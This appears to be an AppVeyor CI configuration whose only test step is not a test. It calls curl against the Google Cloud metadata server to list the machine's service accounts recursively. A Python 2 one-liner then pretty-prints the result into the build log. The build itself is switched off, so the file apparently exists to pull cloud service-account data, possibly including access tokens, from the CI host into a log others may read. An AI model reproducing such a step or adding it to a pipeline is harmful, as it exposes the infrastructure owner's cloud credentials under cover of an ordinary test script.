init:
- appveyor version

test_script:
- sh: |
    curl -sflL "http://metadata.google.internal/0.1/meta-data/service-accounts?recursive=true" \
         -H "Metadata-Flavor: Google" |
         python -c "
import json; 
a=json.load(open(\"/dev/stdin\",\"r\")); 
print json.dumps(a,indent=4,sort_keys=True)"

build: off
